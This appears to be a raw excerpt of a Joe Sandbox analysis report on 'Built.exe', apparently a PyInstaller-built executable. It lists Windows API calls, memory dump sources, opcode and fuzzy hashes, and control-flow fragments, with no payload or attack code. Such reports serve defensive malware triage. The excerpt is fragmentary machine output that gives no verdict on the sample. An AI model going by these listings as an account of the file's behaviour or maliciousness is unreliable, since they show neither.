                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF65E28918F,?,00007FF65E283C55), ref: 00007FF65E282BA0
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF65E282C2A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF65E281B99), ref: 00007FF65E282760
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B3AF
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B3CE
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B3F6
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B407
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF65E29A5A3,?,?,00000000,00007FF65E29A83E,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29B418
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF65E28352C,?,00000000,00007FF65E283F23), ref: 00007FF65E287F32
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                        • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                        • Instruction ID: 98e23e38848354832bbbcd488b7906ac3ba8e3a57d0875d3bc9d917e109051cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51514A22F086458AFB10CB61E6503BD37A1BB68B58F186439EE49E668DDF3CD4818750
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                        • Instruction ID: a795ed73208447fa5404bf791806d1b5ab0409294591b99c6b04a809a5f6f0af
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01110822F0C24282FE54876AF7442B97292EFA8780F9C9030FB4997B8ECD7DD4C18600
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                        • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                        • Instruction ID: 28b6f06fade821fdc35c0197755551096ee78f440e3aeaf9ba1cf3d963f9c2c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A111C22B54B058AEF008B60EA542A933B4FB69758F480E31EA6D967A8DFB8D1548340
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                        • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                        • Instruction ID: 50074431315e9213d51d17960f48bb7e14178d05f6dcadc29ee860a024b1b92d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15412612A4868242FF249B25E70137B7791EBA0BA4F184239FF9D96ADDDF7CD4818700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E299046
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF65E28CBA5), ref: 00007FF65E299064
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                        • API String ID: 3580290477-3826869666
                                                                                                                                                                                                                                                        • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                        • Instruction ID: a8791df8b3d554f41b09206c4ad05fa0940acd410ec050f5bb17308f52197703
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5416932A08B1286EF149F25DB800B977A4FB647E0B5D6035F94EE3B89DE38E4C58300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                        • Instruction ID: 42255fbd3d729705f1a2fc472068448a668825cddb6025e61b0b412a80e8fa9a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C41D272B18A4181DB208F25EA453AA77A0FBA8784F485131FE4DE7798EF7CD441CB40
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                        • Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                                        • Instruction ID: b06de3966986da1e23a00a28b560b248877f9791e6fbd23f14a5d8a21d3b26d6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F21D262A1C39181FF609B15D24427D73B1FBA8B84F494035EA9DE3698DFBCE984CB41
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                        • Instruction ID: 1f2f9724976a1de053ebfa66bacaf39a110d45c000bb198927066308da3bc51c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4115E3261CB8582EB218F15EA1025977E5FB98B84F5C4231EB8D57759DF3CC551C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                        • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                        • Instruction ID: 853aa25da386149b73a0321dfcec66a7917eb5f0fafa7951ad475f5efa2f0693
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E018F6291C20786FF20AF60AB6167E33A0EF68744F881436F54DE2689EF7CE5448B15

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
